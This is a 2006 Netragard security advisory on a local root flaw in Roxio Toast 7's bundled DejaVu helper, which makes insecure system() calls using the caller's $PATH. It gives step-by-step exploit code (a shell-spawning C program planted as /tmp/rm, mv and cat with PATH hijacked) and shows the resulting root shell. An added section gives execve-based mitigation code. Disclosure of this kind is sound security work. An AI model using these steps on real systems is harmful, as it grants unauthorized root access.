
Netragard Security Advisory 2006-06-24

Posted Aug 27, 2006
Authored by Adriel T. Desautels, Netragard | Site netragard.com

Roxio Toast 7 contains locally exploitable vulnerabilities due to insecure system() calls made by suid binaries which use the user's $PATH environment variable.

tags | exploit, vulnerability
SHA-256 | a9a41ad652cad025669286ea026676bda759c1424a925ade740e5e98f354c33a


Netragard, L.L.C. -- Vulnerability Research and Exploitation Team


[Advisory Information]
----------------------------------------------------------------------
Contact : Adriel T. Desautels
Advisory ID : NETRAGARD-20060624
Product Name : Roxio Toast
Product Version : 7 Titanium
Vendor Name : Roxio
Type of Vulnerability : Local Root Compromise
Effort : Easy
Operating System : OSX
Other : Insecure usage of $PATH

[Product Description]
----------------------------------------------------------------------
"Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across
multiple discs; compress and copy DVD movies; add over 50 hours of
music to an audio DVD with on-screen TV menus, shuffle play, and rich
Dolby Digital sound; burn DivX files into DVDs. Do it all with the
fastest and most reliable burning software for the Mac OS - Toast."

--http://www.roxio.com--

[Technical Summary]
----------------------------------------------------------------------
A default installation of Roxio Toast 7 Titanium also installs
DejaVu, which is used for backups. DejaVu uses a control panel helper
application which makes insecure system() calls. More specifically,
an attacker can exploit these system() calls using the user-controlled
environment variable $PATH and gain root access to the system.

[Technical Details]
----------------------------------------------------------------------

This was tested using a configured version of Roxio Toast 7 Titanium.

Roxio Toast 7 contains locally exploitable vulnerabilities due to
insecure system() calls made by suid binaries which use the user's $PATH
environment variable.

The following shows the DejaVu suid binaries:

netragard-test-1$ find . -perm -4000

1-Exploitation is trivial. A user must first create a small program such
as the one demonstrated by simple.c below.

netragard-test-1$ cat > simple.c
#include <stdlib.h>
int main(void) { system("/bin/sh -i"); return 0; }

2-Once the user has created the program, the user must compile the
program, copy the program to replace rm, mv and cat, and insert it
into the $PATH variable.

netragard-test-1$ cc -o chmod simple.c
netragard-test-1$ cp chmod /tmp/rm
netragard-test-1$ cp chmod /tmp/mv
netragard-test-1$ cp chmod /tmp/cat
netragard-test-1$ export PATH=/tmp/:$PATH

3-Once the user has finished with step 2, the user must then launch
the "System Preferences" control panel.

Preferences.app/Contents/MacOS/System\ Preferences

4-After the user has launched the System Preferences helper
application, a GUI window should display. From that window click on
"Deja Vu" located in the "other" section. From there create a manual
backup and then click the backup button. At that point you should be
presented with a root shell prompt:

sh: no job control in this shell
sh-2.05b# id

uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),
79(appserverusr), 80(admin)
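
Added example (not from the advisory or from the vendor): one way a privileged helper can avoid the flaw described above is to drop system() and call execve() with an absolute path and a fixed environment, so neither the shell nor the caller's $PATH takes part in finding the program. The name run_clean and the PATH value /usr/bin:/bin are assumptions chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for every child; nothing is inherited from the caller. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/*
 * Run `path` (must be absolute) with argv and CLEAN_ENV, no shell in between.
 * Returns the child's exit status, or -1 on any failure.
 *
 * Pattern the advisory describes, for contrast (illustrative command string):
 *     system("rm backup.tmp");   sh resolves "rm" through the caller's $PATH
 */
int run_clean(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/')
        return -1;                      /* refuse names that need a $PATH search */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, CLEAN_ENV);  /* execve never searches $PATH */
        _exit(127);                     /* only reached if exec failed */
    }

    int status;
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed hostile value, shaped like the one set in step 2. */
    setenv("PATH", "/tmp/:/usr/bin:/bin", 1);
    /* sh is used here only to inspect the environment the child received. */
    char *const argv[] = { "sh", "-c", "test \"$PATH\" = /usr/bin:/bin", NULL };
    return run_clean("/bin/sh", argv);  /* 0: child saw only the fixed PATH */
}
```

A suid helper written this way would call, for instance, run_clean("/bin/rm", argv) with the file name as a separate argv element, so a planted /tmp/rm is never consulted.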

[Proof Of Concept]
----------------------------------------------------------------------
Successfully Created and Functional

[Vendor Status]
----------------------------------------------------------------------
Vendor contacted and notified of the issue.

Vendor Comment:
Deja Vu, the affected component of Roxio Toast, is bundled into Roxio
Toast and is third party software. Deja Vu is authored by Propaganda
Productions and not Sonic.

[About Netragard]
----------------------------------------------------------------------
Netragard offers specialized application and network security services
which enable its clients to take a proactive security stance. Each of
our services is driven by security professionals who specialize in
specific areas of Information Security. This specialized focus
differentiates Netragard from the competition by enabling Netragard
to produce deliverables which are the product of skilled security
professionals and not the product of automated tools and scripts.

[ For more information please visit http://www.netragard.com ]

---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit

--

Netragard Vulnerability Research Team
advisories at netragard dot com
"We make I.T. Secure"